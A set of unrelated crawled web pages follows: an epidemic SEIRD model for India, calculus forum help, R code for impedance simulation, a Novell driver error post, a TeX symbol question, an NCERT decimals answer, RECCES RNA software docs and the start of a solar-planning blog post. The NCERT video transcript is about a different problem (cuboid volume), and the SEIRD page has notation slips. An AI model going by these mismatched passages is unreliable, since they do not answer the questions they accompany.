EURO Journal on Decision Process
1
,
69
97
.
doi: 10.1007/s40070-013-0004-7
.
Secretaria do Meio Ambiente e dos Recursos Hídricos do Estado do Rio Grande do Norte – Secretariat of Environment and Water Resources
. (
2016
).
Sistema de informações: Bacias Hidrográficas [Information System: Hydrographic Basins]
. .
Sikder
A.
&
Salehin
M.
, (
2015
).
Multi-criteria decision-making methods for rural water supply: a case study from Bangladesh
.
Water Policy
17
(
6
),
1209
1223
.
doi: 10.2166/wp.2015.111
.
Silva
V. B. S.
&
Morais
D. C.
, (
2014
).
A group decision-making approach using a method for constructing a linguistic scale
.
Information Sciences
288
,
423
436
.
doi: 10.1016/j.ins.2014.08.012
.
Silva
V. B. S.
,
Morais
D. C.
&
Almeida
A. T.
, (
2010
).
A multicriteria group decision model to support watershed committees in Brazil
.
Water Resources Management
24
,
4075
4091
.
doi: 10.1007/s11269-010-9648-2
.
Spiliotis
M.
,
Martin-Carrasco
F.
&
Garrote
L.
, (
2015
).
A fuzzy multicriteria categorization of water scarcity in complex water resources systems
.
Water Resource Management
29
(
2
),
521
539
.
doi: 10.1007/s11269-014-0792-y
.
Tsakiris
G.
&
Spiliotis
M.
, (
2011
).
Planning against long term water scarcity: a fuzzy multicriteria approach
.
Water Resource Management
25
,
1103
1129
.
doi: 10.1007/s11269-010-9692-y
.
Vincke
P
, . (
1992
).
Multicriteria Decision Aid
.
Wiley
,
New York
,
USA
.
Wilhite
D. A.
,
Sivakumar
M. V. K.
&
Pulwarty
R.
, (
2014
).
Managing drought risk in a changing climate: the role of national drought policy
.
Weather and Climate Extremes
3
,
4
13
.
doi: 10.1016/j.wace.2014.01.002
.
World Meteorological Organization (WMO) & Global Water Partnership (GWP)
(
2016
).
Introduction
.
Handbook of Drought Indicators and Indices
.
Svoboda
M.
&
Fuchs
B. A.
(eds).
Integrated Drought Management Programme, Integrated Drought Management Tools and Guidelines Series 2
.
World Meteorological Organization
,
Geneva
,
Switzerland
. | 2021-04-14 21:19:25 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4871205985546112, "perplexity": 1420.9925804481588}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038078021.18/warc/CC-MAIN-20210414185709-20210414215709-00332.warc.gz"} |
http://www.cessi.in/coronavirus/page1.php | ## CESSI-nCoV-SEIRD model
Dynamics of a rapidly spreading contagious disease can be studied using simple compartmental models utilizing coupled ordinary differential equations. Recent outbreak of the SARS-CoV-2 has already claimed a significant number of lives and it still remains a highly contagious infection. India being one of the densely populated countries the risk of a severe outbreak is highly probable unless prompt action is taken against controlling the infections. At CESSI we have used the SEIRD (Susceptible-Exposed-Infected-Recovered-Dead) model to observe the variation of individuals in different compartments for the Indian population and the effect of different intervention strategies on the growth rate of the disease. The transitions in between the compartments can be realized from the following block diagram.
where
• S: Number of susceptible individuals
• E: Number of exposed individuals -- asymptomatic in nature but infectious
• I: Number of infected individuals
• R: Number of individuals who have recovered from the disease and are immune
• D: Number of dead individuals
• Total population of the system is constant and is given by N = S+ E + I + R+ D.
The rate of infection (β) indicates the probability of transmission of the disease from a susceptible to an exposed person. The incubation rate (σ) governs the rate of an asymptomatic individual becoming infectious. The recovery rate (γ) is the average rate at which a person recovers and becomes immune to the disease. Lastly, the mortality rate (μ) governs the death rate of infected individuals who die from the disease. For modelling the dynamics of the COVID19 pandemic we assume,
• Normal birth rate and mortality during this pandemic period does not affect the dynamics.
• After recovery from the disease the person becomes immune to the disease and will never become susceptible again.
• Initially the total population of India is considered to be susceptible.
• The population is assumed to be homogeneous and well mixed with no difference among individuals.
With these assumptions the model equations can be written as,
$\begin{array}{rl}\frac{\mathrm{dS}}{\mathrm{dt}}& =-\beta \frac{\mathrm{IS}}{N}{F}_{\mathrm{LD}}\left(t\right)\\ \frac{\mathrm{dE}}{\mathrm{dt}}& =\beta \frac{\mathrm{IS}}{N}{F}_{\mathrm{LD}}\left(t\right)-\sigma E\\ \frac{\mathrm{dI}}{\mathrm{dt}}& =\sigma E-\gamma I-\mu I\\ \frac{\mathrm{dR}}{\mathrm{dt}}& =\gamma I\\ \frac{\mathrm{dD}}{\mathrm{dt}}& =\mu I\text{.}\end{array}$
The severity of the pandemic can be calculated by computing the basic reproduction number (R0). For a fully susceptible population R0 is defined as the number of secondary infections generated by the first infectious individual over the infectious period which is given by R0 = β/(γ + μ). For controlling the pandemic outbreak actions must be taken towards lowering the reproductive number.
The model parameters that we used for the simulations are parameterized to the observed cases in India. In order to implement the effect of the lockdown, we have formulated a containment function, FC(t), which controls the growth rate (β) of the pandemic. The containment function measures the cumulative impact of lockdowns and containment measures such as testing, contact tracing, isolation, and quarantining. For our standard scenario we define the containment function as,
$\begin{array}{rlll}{F}_{C}\left(t\right)& =1.0& \text{where}& t<{t}_{C_start}\\ & =0.5& \text{where}& {t}_{C_start}\ge t<{t}_{C_end}\\ & =0.02& \text{where}& t\ge {t}_{C_end}\\ \begin{array}{}\end{array}\end{array}$
Indian Government announced two phases of lockdown until now. The first phase of the lockdown spanned over 21 days starting from 25th March 2020. In the next phase it is extended until 3rd May totaling a period of 40 days. We started our simulations from 1st March to study the spread of the disease qualitatively. We assume that the total population of the country is susceptible initially. As the containment scenario is not ideal for India, we took the above containment function and fixed the other set of parameters to be β= 0.34/day, σ= 0.1/day, γ= 0.06/day and μ= 0.005/day. The initial population of different compartments are set to be S(t=0)=N= 1.3526*109, I(t=0)= 3, R(t=0)=3 and D(t=0)=0. We also explored the compartmental dynamics by varying the growth rate and population of initially exposed persons. The resulting plots can be found on the Home page.
### PARAMETER SPACE STUDIES
Effect of sample size on prediction results
SEIRD type epidemiological models are dependent on the choice of initial condition and model parameters. To understand the dependence of the sample size on the model prediction, we simulated our standard scenario with different size of initial population of the country. This plot indicates that the undersampling of the initial population will critically affect the model prediction.
Doubling time variation
The amount of time taken for the number of infected individuals to double itself is known as Doubling time. Here is an example how the doubling time is calculated. If on day 14 the number of confirmed cases is 100 and it doubled up from 50 on day 2, then doubling time for this case is 12 days which is assigned to day 14 on the curve. In the above plot we show the temporal variation of our model predicted doubling time in a scenario where containment strength is at 70% and the observed data.
Evolution of all compartments with different containment strengths
In this panel we show the variation of number of infected, recovered and deceased individuals with different containment strengths.
New infected and recovered individuals
Here is a comparison of the number of new infected and recovered individuals per day from observation and our model prediction.
Growth rate of the disease
The growth rate of the disease is compared from model and observations to understand the dynamics of the pandemic in Indian context.
Progression of reproduction number
The effective reproduction number variation with time can be inferred from the above plot.
References
1. A state-level epidemiological model for India: INDSCI-SIM
2. SEIR and SEIRS models
3. Richard J. H. et. al., Public health interventions and epidemic intensity during the 1918 influenza pandemic (2007), PNAS, 104 (18), May 2007, Pages 7582-7587
4. Flaxman, S. et. al., Estimating the effects of non-pharmaceutical interventions on COVID-19 in Europe (2020), Nature, June 2020
5. https://www.who.int/bulletin/online_first/20-255695.pdf
6. Simulation & Parameter Estimation of SEIRD Model.
7. Baker RE, Peña J-M, Jayamohan J and Jérusalem A., 2018, Mechanistic models versus machine learning, a fight worth fighting for the biological community? Biol. Lett., 1420170660
8. Chowell G., Fitting dynamic models to epidemic outbreaks with quantified uncertainty: A primer for parameter uncertainty, identifiability, and forecasts (2017), Infectious Disease Modelling Volume 2, Issue 3, August 2017, Pages 379–398 | 2023-02-02 20:58:10 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 3, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6728289723396301, "perplexity": 1377.1907919359921}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500041.18/warc/CC-MAIN-20230202200542-20230202230542-00611.warc.gz"} |
http://mathhelpforum.com/calculus/39917-calc-math-question.html | Math Help - calc math question
1. calc math question
Hey,
I was having a little trouble with these two calculus word problems. I would appreciate any help that I can get. Thanks a lot.
1) Let R be the shaded region bounded by the graph of y = lnx and the line
y = (x - 2).
a) Find the area of R.
b) Find the volume of the solid generated when R is rotated about the horizontal line y = -3.
c) Write, but do not evaluate, an integral expression that can be used to find the volume of the solid generated when R is rotated about the y-axis.
2) At an intersection in Thomasville, Oregon, cars turn left at the rate
L(t) = 60 $square root (t)$ $sin^2(t/3)$ cars per hour over the time interval 0 <= t <= 18.
a) To the nearest whole number, find the total number of cars turning left at the intersection over the time interval 0 <= t <= 18 hours.
b) Traffic engineers will consider turn restrictions when L(t) >= 150 per hour. Find all values of t for which L(t) >= 150 and compute the average value of L over this time interval. Indicate units of measure.
c) Traffic engineers will install a signal if there is any two-hour time interval during which the product of the total number of cars turning left and the total number of oncoming cars traveling straight through the intersection. Does this intersection require a traffic signal? Explain the reasoning that leads to your conclusion.
2. For the solid of revolution, we can use washers or shells.
Washers:
${\pi}\int_{.158594}^{3.14619}\left[(ln(x)+3)^{2}-(x+1)^{2}\right]dx$
Shells:
$2{\pi}\int_{-1.841405}^{1.146193}(3+y)(y+2-e^{y})dy$
3. for the first part (finding the area), use $\int_{0.158594}^{3.14619}\left[(lnx)-(x-2)\right]dx$since observing that y=ln x is on top of y=x-2, we can integrate with respect to the x-axis. observing that x=0.158594 and x=3.14619 are the points where the two functions meet, we attain the limits of integration.
4. Originally Posted by Qcalc101
Hey,
I was having a little trouble with these two calculus word problems. I would appreciate any help that I can get. Thanks a lot.
1) Let R be the shaded region bounded by the graph of y = lnx and the line
y = (x - 2).
a) Find the area of R.
b) Find the volume of the solid generated when R is rotated about the horizontal line y = -3.
c) Write, but do not evaluate, an integral expression that can be used to find the volume of the solid generated when R is rotated about the y-axis.
2) At an intersection in Thomasville, Oregon, cars turn left at the rate
L(t) = 60 $square root (t)$ $sin^2(t/3)$ cars per hour over the time interval 0 <= t <= 18.
a) To the nearest whole number, find the total number of cars turning left at the intersection over the time interval 0 <= t <= 18 hours.
b) Traffic engineers will consider turn restrictions when L(t) >= 150 per hour. Find all values of t for which L(t) >= 150 and compute the average value of L over this time interval. Indicate units of measure.
c) Traffic engineers will install a signal if there is any two-hour time interval during which the product of the total number of cars turning left and the total number of oncoming cars traveling straight through the intersection. Does this intersection require a traffic signal? Explain the reasoning that leads to your conclusion.
Ahh...the 2006 AP Calculus Free Response...I remember those...that was the year I took the exam...and passed...
This may help you out, since I'm dead tired right now: 2006 AP Calculus AB Scoring Guidelines
The explanations are vague, but its better than nothing!
I'll answer #2 when I get the chance. | 2014-03-13 13:41:13 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 7, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6143350601196289, "perplexity": 436.83459645570787}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-10/segments/1394678676855/warc/CC-MAIN-20140313024436-00026-ip-10-183-142-35.ec2.internal.warc.gz"} |
http://lacey.se/science/eis/simulating-eis-in-r/ | # Simulating EIS in R
I've been asked on a few occasions about how I go about simulating impedance spectra in the R language. It's essentially based on straightforward maths with some functions defined to make the more complicated calculations simple. This page here gives an example of the approach I normally use, and the approach that underpins the other simulations shown on this website.
First, we can create a function to create a vector of values for the angular frequency, $$\omega$$, based on minimum and maximum values of log frequency and a number of points per decade:
omega_range <- function(low.logf, high.logf, p.per.dec) {
2 * pi * 10^seq(low.logf, high.logf, length.out = (p.per.dec * (high.logf - low.logf)) + 1)
}
### Equivalent circuit elements
Now we can create functions which calculate the complex impedance for each of the individual circuit elements. If you're unclear on how these are calculated, then I recommend looking at the other pages in this section for the mathematical definitions.
A function for the impedance of a resistor is not strictly necessary but I find it helps for readability later:
Z_R <- function(R) {
complex(real = R, imaginary = 0)
}
All the following elements are functions of angular frequency. First the capacitor:
Z_C <- function(C, omega) {
complex(real = 0, imaginary = -1/(omega * C))
}
Constant phase element:
Z_Q <- function(Q, n, omega) {
1/(Q * (complex(real = 0, imaginary = 1) * omega)^n)
}
Semi-infinite Warburg:
Z_W <- function(sigma, omega) {
j = complex(real = 0, imaginary = 1)
(1 - j) * sigma * omega^-0.5
}
Finite length Warburg:
Z_FLW <- function(Z0, tau, omega) {
j = complex(real = 0, imaginary = 1)
Z0 * (j * omega * tau)^-0.5 * tanh((j * omega * tau)^0.5)
}
Finite space Warburg (note: you must have the pracma package installed, which contains the required coth() function):
Z_FSW <- function(Z0, tau, omega) {
require(pracma)
j = complex(real = 0, imaginary = 1)
Z0 * (j * omega * tau)^-0.5 * coth((j * omega * tau)^0.5)
}
### Simple simulation
First we need to define which frequencies we will calculate, using the omega_range() function defined earlier. For example:
omega <- omega_range(low.logf = -0.7, high.logf = 5.2, p.per.dec = 8)
And to make life easier, we can create a function so we can add the impedances of circuit elements in parallel:
par <- function(a, b) {
1/((1/a) + (1/b))
}
Then simulating a typical equivalent circuit might look something like this, using the Randles circuit as an example:
z_rand <- Z_R(5) + par((Z_R(45) + Z_W(40, omega)), Z_C(2E-5, omega))
The z_rand variable is a vector of complex numbers which we can't plot very easily:
str(z_rand)
## cplx [1:49] 85.6-35.9i 80.9-31.2i 76.7-27.1i ...
So we can create a data frame with the numbers we want using the Re() and Im() functions in R for extracting the real and imaginary parts from the complex numbers.
df <- data.frame(Re = Re(z_rand), Im = -Im(z_rand), f = omega/(2 * pi), omega = omega)
str(df)
## 'data.frame': 49 obs. of 4 variables:
## $Re : num 85.6 80.9 76.7 73.2 70.1 ... ##$ Im : num 35.9 31.2 27.1 23.6 20.6 ...
## $f : num 0.2 0.265 0.351 0.466 0.619 ... ##$ omega: num 1.25 1.66 2.21 2.93 3.89 ...
And now it's just a question of creating the plot:
library(ggplot2)
ggplot(df, aes(x = Re, y = Im)) +
geom_point() + coord_fixed()
The coord_fixed() function for ggplot is extremely useful here in ensuring the proportionality of the axes in the Nyquist plot.
Thank you for reading!
These pages will remain open to all and 100% ad-free, now and always. If you like this page and want to see more, please consider buying me a cup of coffee, to keep me motivated and to help with the running costs of this site!
comments powered by Disqus | 2021-09-17 18:16:01 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3884037137031555, "perplexity": 3776.540199180408}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780055775.1/warc/CC-MAIN-20210917181500-20210917211500-00278.warc.gz"} |
https://forums.novell.com/showthread.php/498470-Error-in-AD-driver-Trace-0 | ## Error in AD driver Trace 0
Been seeing this off and on for a few months, in our MAD driver
Code:
DirXML Log Event -------------------
Driver: \foo\SERVICES\IDMDriverSet\bar
Channel: Subscriber
Status: Error
Message: Code(-9076) Unhandled error in event loop: java.io.IOException: Wrong index checksum, store was not closed properly and could be corrupted.
Nothing SEEMS to be acting different, but I do want to clear it. Checked google and geoffc's error code listings to no avail.
any ideas?
thanks dg | 2018-05-24 01:20:40 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.19753195345401764, "perplexity": 12147.460134709665}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794865863.76/warc/CC-MAIN-20180523235059-20180524015059-00159.warc.gz"} |
http://tex.stackexchange.com/questions/32026/tombstones-and-beer-mugs/32096 | tombstones and beer mugs
I'm trying to find an alternative to the standard tombstone qed symbol for more informal papers. I initially thought of an empty square with Pub written inside, but what would actually be better would be a small beer mug symbol. (much like the one found in this set of icons http://dutchicon.com/iconsets/food-and-drinks-icons)
Unfortunately there doesn't seem to such a symbol in the comprehensive latex symbol list (although many funny symbols can be found there). Has anyone thought about this? Is there any quick-and-dirty solution?
-
Use the beer mug unicode symbol U+1F37A see fileformat.info/info/unicode/char/1f37a/index.htm – Yiannis Lazarides Oct 19 '11 at 12:25
ah, excellent. is there a quick way insert unicode characters in tex? – donkey kong Oct 19 '11 at 13:11
(without using xetex that is) – donkey kong Oct 19 '11 at 14:11
Not without a font! But you can create one using metapost! I would rather use a red tombstone mark, as in paint the town red:) – Yiannis Lazarides Oct 20 '11 at 2:59
but isn't metapost evil? (when using pdftex/tikz) – donkey kong Oct 20 '11 at 10:53
I personally don't like the idea of the beer mug, but you could redefine \qedsymbol to use a previously saved image of a beer mug:
\documentclass{article}
\usepackage{graphicx}
\usepackage{amsthm}
\renewcommand\qedsymbol{\raisebox{-4pt}{\includegraphics[height=10pt]{beer-mug}}}
\begin{document}
\begin{proof}
Test proof of a really basic theorem.
\end{proof}
\end{document}
-
Here's a nice vector graphics beer mug that's available under a CC license: thenounproject.com/noun/beer/#icon-No634 – Seamus Oct 20 '11 at 8:12
thanks to both Seamus and Gonzalo, that's probably the easiest way to do it. – donkey kong Oct 20 '11 at 10:52
@gonzalo: it's for an informal document, do you have an alternative to suggest? – donkey kong Oct 20 '11 at 10:52
Would you settle for a \Coffeecup from the marvosym package instead?
-
coffee is the fuel for proving theorems, so after a proof you really need something different! :) but thanks for the suggestion. – donkey kong Oct 20 '11 at 10:29
How about a smiley face? :) There are some both in the wasysym and the marvosym package. I guess everyone is happy, when he arrives at the end of a demonstration. ;)
-
depends on the proof... – donkey kong Oct 22 '11 at 14:16
related question: tex.stackexchange.com/questions/3695/smileys-in-latex – doncherry Oct 26 '11 at 11:53
...and no smiley with a beer mug... that's sad... :P – Count Zero Oct 26 '11 at 13:33 | 2016-06-30 04:55:49 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6656095385551453, "perplexity": 2845.751746743396}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-26/segments/1466783398075.47/warc/CC-MAIN-20160624154958-00118-ip-10-164-35-72.ec2.internal.warc.gz"} |
https://www.lidolearning.com/questions/m-bb-ncertexemplar6-ch4-ex1-q34/9-210-6100-is-equal-to-the-dec/ | # NCERT Exemplar Solutions Class 6 Mathematics Solutions for Exercise in Chapter 4 - Fractions and Decimals
Question 33 Exercise
9 + (2/10) + (6/100) is equal to the decimal number ____
9 + (2/10) + (6/100) is equal to the decimal number 9.26.
Fractions with denominators 10,100, etc. can be written in a form, using a decimal point, called decimal numbers or decimals.
9 + (2/10) + (6/100) = 9 + 0.2 + 0.06
= 9.26
Video transcript
"hello students welcome to lido q a video session i am saf your math tutor and question for today is v is the volume of a cuboid of a dimension a b c and s is the surface area then prove that 1 upon b which will be equal to 2 upon s bracket of 1 upon a plus 1 upon b plus 1 upon c bracket close so here we need to prove this prove this first of all we need to see the question question is the dimensions are given in the question you can see dimension of the q bar length which is l and that is equal to a breadth that is b and that is equal to b that is given in the question height and that is h and that is c now we know that the volume of the cube can be given by the formula length into breadth into height volume of the cuboid which is equal to length into breath into height now this can also be written as a into b into c because from the question all these dimensions are having measurements length a breadth b height in c which would be equal to abc and that is the volume of cuboid now again surface area of a cube s is equal to so we have the formula for surface area s is equal to 2 into bracket of lb plus bh plus hl length breadth and height are lb and h respectively so you can write this like s is equal to 2 into length is a breadth is b height is c a b plus b c plus c a now let us name this as equation number two and this name let us name this volume of the cuboid as equation number one considering this one and two in mind we have from the question one upon v is equal to 2 upon s bracket of 1 upon a plus 1 upon b plus 1 upon c that is in the question so we need to first of all take allergies from the prove that from the prove that lhs is equal to 2 upon s 1 upon a plus 1 upon b plus 1 upon c and that is the lhs if you take lcm then 2 upon s will be equal to ab plus bc plus ca divided by abc so here you can substitute the value of s from the equation number two so from two you have 2 upon 2 into a b plus bc plus ca into a b plus b c plus c a upon abc so simplifying this it will give you 1 upon abc and this 1 upon abc will be equal to 1 upon b which is exactly equal to your left hand side that is left hand side which is equal to right hand side from the question so this was from the question your right hand side i'll see over here right hand side and which is equal to left hand side hence lhs is equal to i rhs either way so this this is the proved statement now hence prove if you have any doubt you can drop it down in our comment section and subscribe to lido for more such interesting q a sessions thank you for watching"
Related Questions
Exercises
Lido
Courses
Teachers
Book a Demo with us
Syllabus
Maths
CBSE
Maths
ICSE
Science
CBSE
Science
ICSE
English
CBSE
English
ICSE
Coding
Terms & Policies
Selina Question Bank
Maths
Physics
Biology
Allied Question Bank
Chemistry
Connect with us on social media! | 2022-05-29 05:18:43 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8375264406204224, "perplexity": 580.0696686989794}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652663039492.94/warc/CC-MAIN-20220529041832-20220529071832-00034.warc.gz"} |
https://new.rosettacommons.org/docs/latest/application_documentation/rna/recces | Author: Fang-Chieh Chou
May 2015 by Fang-Chieh Chou (fcchou [at] stanford.edu).
# Code and Demo
The main RECCES application is main/source/src/apps/public/rna_util/recces_turner.cc. It is accompanied by a set of python codes in tools/recces. A README file for the python codes is included. The optimized RECCES score function is main/database/scoring/stepwise/rna/turner.wts.
For a minimal demonstration of RECCES, see: demos/public/recces/. Online documentation for the RECCES demo is also available.
# Application purpose
This code provides a way to compute the free energy of an RNA molecule using comprehensive sampling to account for the conformational entropy. RECCES also allows rapid reweighting of the score function by caching the sub-scores of each sampled conformation.
# Algorithm
RECCES uses simulated-tempering Monte Carlo methods to efficiently sample the conformational ensemble. Standard Rosetta score terms are used for the calculation; the terms are then reweighted to fit against experimental folding
# Limitations
• RECCES currently works for RNA duplexes and dangling-ends only. While it is possible to extend the framework to other non-canonical RNA motifs and even protein applications, such work has not yet been performed.
• The score terms being cached are currently hard-coded in the source code (recces_turner.cc) and the Python scripts; therefore adding new score terms requires editing the codes, which is not convenient. This can be make more general in the future by including a current_score_terms file for both the Rosetta and Python codes.
# Modes
There is only one mode to run RECCES at present.
# Input Files
There is no specific input file required RECCES. One may use a different score function file for the simulated tempering simulation, other than the standard stepwise/rna/turner.wts (but if the score terms are different than in those turner.wts, then you need to modify the source code).
# Tutorial
See demos/public/recces/ for the latest demo for running RECCES.
# Options
Below are a list of available arguments for the recces_turner application.
-seq1 <String>
The sequence of the first strand (or the full sequence if it is single-stranded).
-seq2 <String>
The sequence of the second strand (skip if it is single-stranded).
-n_cycle <Int>
The number of Monte Carlo cycles.
-temps <Double/List of Doubles>
The simulation temperature. If it is a single value, the code performs
standard Monte Carlo at the given temperature. If the input is a list of
values, the code will run simulated tempering (ST).
-st_weights <List of Doubles>
The ST weights for simulations. Need to be specified if multiple temperatures
are given. Can be determined by short pre-runs (see demo).
-out_prefix <String>
Prefix for the RECCES output files.
-save_score_terms
If this option is supplied, RECCES will cache the values for each score terms.
Otherwise only the score histograms are returned.
-a_form_range <Double>
The sampling range for A-form conformations (duplex). Default is 60
(+/- 60 degress from ideal values).
-dump_pdb
If suppiled, the program will dump pdb files for examination.
-n_intermediate_dump <Int>
Dump the given amount of pdb structures for illustration purposes.
# Expected Outputs
Each RECCES run will generate one or several (depending whether ST is used) score histograms. If -save_score_terms is used, it also outputs the cached score terms for each sampled conformation. The result can then be analyzed using the Python scripts (see demo and tools/recces/README). | 2021-10-28 14:36:46 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3623791038990021, "perplexity": 5375.884284476465}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323588341.58/warc/CC-MAIN-20211028131628-20211028161628-00392.warc.gz"} |
https://www.timescale.com/blog/how-i-am-planning-my-photovoltaic-system-using-timescaledb-nodered-and-grafana/ | # How I Am Planning My Photovoltaic System Using TimescaleDB, Node-RED, and Grafana
Planning photovoltaic systems isn’t easy, even with a specialist at hand. They ask all kinds of questions regarding your power consumption, typical usage hours, or distribution over a year.
Collecting consumption data at the granularity of a few seconds is key to finding all the answers for the more precision-loving audience, such as myself.
The main reason I spent all this time understanding our actual consumption is simple: cost efficiency. My wife and I have an electricity consumption way out of what is expected of a German household with just two people (and two cats!). That said, I really wanted to get the most out of the system, no matter the cost (well, almost).
